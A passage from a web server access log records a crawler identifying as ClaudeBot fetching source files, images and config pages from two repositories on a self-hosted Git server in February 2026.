"/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.gitignore" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12800] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10917] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11981] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12808] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2Fdata%2Flogs" [Client 216.73.216.188] [Length 23402] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 216.73.216.188] [Length 11579] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fimages%2FControlRoom3.png" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 10500] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 216.73.216.188] [Length 12563] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fuvicorn" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 216.73.216.188] [Length 13327] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 11098] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fimages%2FControlRoom2.png" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 216.73.216.188] [Length 11008] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 11101] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9798] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9798] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fpip3.12" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9796] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fwatchfiles" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fpages" [Client 216.73.216.188] [Length 4850] [Gzip 